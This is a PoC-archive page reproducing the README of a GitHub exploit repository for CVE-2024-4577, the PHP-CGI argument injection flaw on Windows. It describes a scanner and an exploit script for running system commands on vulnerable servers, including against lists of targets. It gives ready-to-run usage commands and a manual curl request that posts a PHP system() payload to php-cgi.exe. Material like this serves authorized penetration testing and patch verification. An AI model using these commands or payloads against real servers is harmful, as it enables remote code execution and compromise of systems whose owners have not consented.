Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2024-4577 PoC — Argument Injection in PHP-CGI

Source
https://github.com/r0otk3r/CVE-2024-4577
Associated Vulnerability
Title:Argument Injection in PHP-CGI (CVE-2024-4577)
Description:In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, when using Apache and PHP-CGI on Windows, if the system is set up to use certain code pages, Windows may use "Best-Fit" behavior to replace characters in command line given to Win32 API functions. PHP CGI module may misinterpret those characters as PHP options, which may allow a malicious user to pass options to PHP binary being run, and thus reveal the source code of scripts, run arbitrary PHP code on the server, etc.
Readme
# CVE-2024-4577 - PHP CGI Argument Injection RCE

## Summary

CVE-2024-4577 is a critical **PHP CGI argument injection vulnerability** that affects Windows systems running PHP in CGI mode. This flaw allows remote attackers to **inject arguments** into PHP's command line via specially crafted URLs, leading to **remote code execution (RCE)**.

This repository includes:

- `CVE-2024-4577.py`: A **scanner** to detect vulnerable targets.
- `exploit.py`: An **exploit tool** that sends PHP code and executes system commands on the vulnerable server.

> ⚠️ **DISCLAIMER**  
> This project is for **educational and authorized testing** only. Any misuse of this code is not the responsibility of the author. Use responsibly and only in environments you own or have explicit permission to test.

---

## Requirements

- Python 3.x
- `requests` library

Install dependencies:

```bash
pip install -r requirements.txt
```
---

# Scanner Usage

Detect if a target is vulnerable to CVE-2024-4577:

## Single Target
```bash
python3 CVE-2024-4577.py -u http://target.com
```
![1](https://github.com/user-attachments/assets/2877a065-f568-4c9b-8b87-1bb220f1b904)

## Multiple Targets from File
```bash
python3 CVE-2024-4577.py -f urls.txt
```
![2](https://github.com/user-attachments/assets/45dbd725-4e57-4c3a-a33a-27a3ef3d6547)

## Custom Path (optional)
```bash
python3 CVE-2024-4577.py -u http://target.com -p /custom/path.php
```
### Example Vulnerable Paths
The scanner and exploit test common CGI endpoints like:
```bash
/php-cgi/php-cgi.exe
/index.php
/test.php
/test.hello
```
The payload bypasses cgi.force_redirect and prepends malicious PHP using php://input.

---
# Exploit Usage

Execute arbitrary system commands on a vulnerable target:

## Single Target
```bash
python3 exploit.py -u http://target.com -c "id"
```
![4](https://github.com/user-attachments/assets/027fe98c-4b0e-4729-8844-dddb460d3eb8)

## Multiple Targets from File
```bash
python3 exploit.py -f urls.txt -c "id"
```
![5](https://github.com/user-attachments/assets/01de96c5-09e8-4065-b162-484985834c01)
---
## Using curl

You can also exploit the vulnerability manually using curl
```bash
curl -X POST http://target.com/php-cgi/php-cgi.exe -d "<?php system('uname -a'); ?>"
```
This sends a PHP payload that executes uname -a on the server and returns the output.

![3](https://github.com/user-attachments/assets/fd134d72-7849-481c-b1ce-45e63ba61187)
---

# License

This code is released under the MIT License. See LICENSE for more information.

---

## Official Channels

- [YouTube @rootctf](https://www.youtube.com/@rootctf)
- [X @r0otk3r](https://x.com/r0otk3r)
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →